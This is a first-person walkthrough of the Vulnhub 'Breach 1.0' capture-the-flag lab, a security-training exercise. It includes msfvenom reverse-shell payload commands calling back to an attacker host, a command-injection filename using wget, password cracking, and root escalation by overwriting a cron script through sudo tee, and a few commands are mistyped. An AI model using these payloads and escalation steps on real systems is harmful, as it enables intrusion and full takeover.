First we start with a nmap scan but it took really too long to enumerate it,
So i tried browsing to the ip and found a website there so i started nikto and dirb
Decoding this string in base64 gives us
#TODO Where is the pcap located on the website
From checking the source code of the web application i found a strange string that looked like base64 and it gave me a user/password to login into the impresscms
when i found the keystore i downloaded a tool to bruteforce the password because i needed the private key to be in a differente, to be able to export it in wireshark to decrypt the pcap
While this worked i tried to be smart about it and did a string on the keyfile wich revealed the word “tomcat” so i tried it as password and it worked!
after finding the password is tomcat
keytool -importkeystore toretype JKS -deststoretype PKCS12 -destkeystore keystore.p12
export the private key from the p12
openssl pkcs12 -in keystore.p12 -nocerts -out privatekey.pem
openssl rsa -in privatekey.pem -out keyout.pem
This decrypt the pcap
After searching a LONG time on how to connect to the tomcat service, firefox doesnt work netcat either i found out you can do that with openssl
openssl s_client -connect 192.168.110.140:8443
After debugging the openssl for hours i decided to try with another browser than firefox, i was able to reach the tomcat server with edge!
We can login with the credentials found in the pcap
Because we are admin of the tomcat we can upload a malicious file
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.101.110 LPORT=443 -f war -o /root/Dropbox/Vulnhub/Breach/shell.war
jar -xvf shell.war # to see name of jsp to call
nc -lvp 443
sfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.110.110 LPORT=443 -f elf breachmeter.elf
While enumerating the system i found there isnt a root password for mysql, so i dumped all the database, and found the md5 hash for the user milton
submitting this hash to crackstation revealed the password is thelaststraw
checking the logs on this server revealed
Jul 5 06:39:01 Breach CRON: (root) CMD (/usr/share/cleanup/tidyup.sh)
After trying to inject bash command into the script because i control the destination i found a way to bypass the script so it doesnt delete my file because he doesn’t handle space.
I tried injecting command with a filename like a&&wget 192.168.110.110 so the command that would pass into th shell would be
rm -rf swingline/a&&get 192.168.110.110 wich would execute the command.
I banged my head for about two days trying to exploit via this method
I found something usefull on the internet on how to inject arguments without spaceuo
Even this didn’t work so i did what i had learned best while doing my oscp, Try Harder! (If you are stuck somwhere restart your enumeration from scratch)
While restarting my enumeration i came across a comment in one of the images of the website while running exiftool on it.
It had the comment “cofeestains”
From remembering my enumeration i knew there was another user on the system that didn’t seems to interract with it (no trace of him in the logs and nothing in his home directory) his name is blumbergh. I had already tried some basics passwords on the account, but this time i tried with the new information.
su blumbergh // coffeestains
I was in!
Since i though he was the server administrator because he wouldnt need to write anything in his home directory if we can be root.
User blumbergh may run the following commands on Breach:
(root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh
Okay we dont have all the sudo privilege but we can modify tidyup.sh!
cat /tmp/tidyup.sh | sudo tee /usr/share/cleanup/tidyup.sh
from now we just wait for a connection with our metasploit handler.
set payload linux/x86/meterpreter/reverse_tcp
we then get a shell as root! Finally 🙂
root@Breach:/root# cat .flag.txt
______ _ __ _____ _____ _ _____ _
| ___ \ | | / | | _ | |_ _| | | ___| | |
| |_/ /_ __ ___ __ _ ___| |__ `| | | |/’ |______| | | |__ ___| |__ _ __ __| |
| ___ \ ‘__/ _ \/ _` |/ __| ‘_ \ | | | /| |______| | | ‘_ \ / _ \ __| ‘_ \ / _` |
| |_/ / | | __/ (_| | (__| | | || |_\ |_/ / | | | | | | __/ |__| | | | (_| |
\____/|_| \___|\__,_|\___|_| |_\___(_)___/ \_/ |_|\___\____/_| |_|\__,_|
Congrats on reaching the end and thanks for trying out my first #vulnhub boot2root!
Shout-out to knightmare, and rastamouse for testing and g0tmi1k for hosting.